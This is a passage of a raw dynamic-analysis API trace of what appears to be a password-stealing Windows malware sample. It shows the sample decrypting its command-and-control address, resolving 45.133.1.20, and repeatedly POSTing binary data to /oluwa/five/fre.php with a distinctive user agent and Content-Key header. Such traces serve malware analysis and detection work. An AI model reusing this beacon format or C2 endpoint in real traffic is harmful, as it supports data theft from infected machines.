ai_next=0x0)) [0202.357] GetProcessHeap () returned 0x6a0000 [0202.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0202.357] GetProcessHeap () returned 0x6a0000 [0202.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0202.358] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0202.358] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0202.358] GetProcessHeap () returned 0x6a0000 [0202.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0202.358] GetProcessHeap () returned 0x6a0000 [0202.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0202.359] GetProcessHeap () returned 0x6a0000 [0202.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0202.359] GetProcessHeap () returned 0x6a0000 [0202.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0202.360] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0202.360] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0202.360] GetProcessHeap () returned 0x6a0000 [0202.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0202.361] GetProcessHeap () returned 0x6a0000 [0202.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0202.361] send (s=0x550, buf=0x6b5c98*, len=242, flags=0) returned 242 [0202.361] send (s=0x550, buf=0x6bb998*, len=159, flags=0) returned 159 [0202.361] GetProcessHeap () returned 0x6a0000 [0202.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0202.362] recv (in: s=0x550, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0202.451] GetProcessHeap () returned 0x6a0000 [0202.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0202.453] GetProcessHeap () returned 0x6a0000 [0202.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0202.454] GetProcessHeap () returned 0x6a0000 [0202.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0202.454] GetProcessHeap () returned 0x6a0000 [0202.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0202.455] closesocket (s=0x550) returned 0 [0202.455] GetProcessHeap () returned 0x6a0000 [0202.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa70 | out: hHeap=0x6a0000) returned 1 [0202.455] GetProcessHeap () returned 0x6a0000 [0202.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0202.456] GetProcessHeap () returned 0x6a0000 [0202.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0202.456] GetProcessHeap () returned 0x6a0000 [0202.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0202.457] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x6c4) returned 0x550 [0202.459] Sleep (dwMilliseconds=0xea60) [0202.461] GetProcessHeap () returned 0x6a0000 [0202.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0202.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.464] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0202.544] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.545] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0202.624] GetProcessHeap () returned 0x6a0000 [0202.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0202.624] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.625] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0202.626] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.626] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0202.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.629] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0202.629] GetProcessHeap () returned 0x6a0000 [0202.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0202.630] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.630] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0202.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.632] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0202.632] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.633] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0202.633] GetProcessHeap () returned 0x6a0000 [0202.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0202.634] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0202.634] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0202.635] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0202.636] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0202.636] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0202.637] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0202.637] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0202.638] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0202.638] GetProcessHeap () returned 0x6a0000 [0202.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0202.638] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0202.639] GetProcessHeap () returned 0x6a0000 [0202.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0202.640] GetProcessHeap () returned 0x6a0000 [0202.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0202.640] GetProcessHeap () returned 0x6a0000 [0202.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0202.641] GetProcessHeap () returned 0x6a0000 [0202.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0202.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.642] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0202.649] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.650] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0202.710] GetProcessHeap () returned 0x6a0000 [0202.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0202.711] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.711] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0202.712] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.712] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0202.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.747] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0202.747] GetProcessHeap () returned 0x6a0000 [0202.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0202.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.781] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0202.822] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.823] CryptDestroyKey (hKey=0x6ad560) returned 1 [0202.824] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.824] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0202.824] GetProcessHeap () returned 0x6a0000 [0202.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0202.825] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0202.901] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0202.902] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0202.903] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0202.904] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0202.904] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0202.905] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0202.905] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0202.905] GetProcessHeap () returned 0x6a0000 [0202.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0202.906] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0202.906] GetProcessHeap () returned 0x6a0000 [0202.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baab0 [0202.906] socket (af=2, type=1, protocol=6) returned 0x554 [0202.906] connect (s=0x554, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0202.929] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0202.929] GetProcessHeap () returned 0x6a0000 [0202.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0202.930] GetProcessHeap () returned 0x6a0000 [0202.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0202.930] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0202.931] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0202.931] GetProcessHeap () returned 0x6a0000 [0202.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0202.932] GetProcessHeap () returned 0x6a0000 [0202.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0202.932] GetProcessHeap () returned 0x6a0000 [0202.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0202.932] GetProcessHeap () returned 0x6a0000 [0202.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0202.933] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0202.934] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0202.934] GetProcessHeap () returned 0x6a0000 [0202.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0202.934] GetProcessHeap () returned 0x6a0000 [0202.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0202.935] send (s=0x554, buf=0x6b5c98*, len=242, flags=0) returned 242 [0202.936] send (s=0x554, buf=0x6bb998*, len=159, flags=0) returned 159 [0202.936] GetProcessHeap () returned 0x6a0000 [0202.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0202.936] recv (in: s=0x554, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0203.071] GetProcessHeap () returned 0x6a0000 [0203.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0203.071] GetProcessHeap () returned 0x6a0000 [0203.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0203.072] GetProcessHeap () returned 0x6a0000 [0203.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0203.072] GetProcessHeap () returned 0x6a0000 [0203.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0203.073] closesocket (s=0x554) returned 0 [0203.073] GetProcessHeap () returned 0x6a0000 [0203.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baab0 | out: hHeap=0x6a0000) returned 1 [0203.073] GetProcessHeap () returned 0x6a0000 [0203.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0203.074] GetProcessHeap () returned 0x6a0000 [0203.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0203.074] GetProcessHeap () returned 0x6a0000 [0203.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0203.075] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x6c0) returned 0x554 [0203.079] Sleep (dwMilliseconds=0xea60) [0203.081] GetProcessHeap () returned 0x6a0000 [0203.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0203.082] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.082] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0203.091] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.091] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0203.152] GetProcessHeap () returned 0x6a0000 [0203.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0203.153] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.153] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0203.154] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.154] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0203.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.157] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0203.157] GetProcessHeap () returned 0x6a0000 [0203.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0203.159] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.159] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0203.160] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.160] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0203.162] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.267] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0203.267] GetProcessHeap () returned 0x6a0000 [0203.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0203.268] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0203.268] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0203.269] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0203.270] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0203.271] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0203.271] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0203.272] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0203.272] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0203.272] GetProcessHeap () returned 0x6a0000 [0203.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0203.273] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0203.273] GetProcessHeap () returned 0x6a0000 [0203.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0203.274] GetProcessHeap () returned 0x6a0000 [0203.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0203.274] GetProcessHeap () returned 0x6a0000 [0203.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0203.275] GetProcessHeap () returned 0x6a0000 [0203.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0203.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.279] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0203.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.293] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0203.304] GetProcessHeap () returned 0x6a0000 [0203.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0203.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.305] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0203.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.306] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0203.308] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.308] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0203.308] GetProcessHeap () returned 0x6a0000 [0203.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0203.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.310] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0203.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.312] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0203.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.313] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0203.313] GetProcessHeap () returned 0x6a0000 [0203.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0203.314] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0203.314] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0203.315] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0203.315] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0203.316] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0203.317] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0203.318] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0203.360] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0203.360] GetProcessHeap () returned 0x6a0000 [0203.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0203.361] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0203.361] GetProcessHeap () returned 0x6a0000 [0203.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baac0 [0203.361] socket (af=2, type=1, protocol=6) returned 0x558 [0203.362] connect (s=0x558, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0203.386] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0203.386] GetProcessHeap () returned 0x6a0000 [0203.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0203.386] GetProcessHeap () returned 0x6a0000 [0203.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0203.388] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0203.390] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0203.390] GetProcessHeap () returned 0x6a0000 [0203.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, 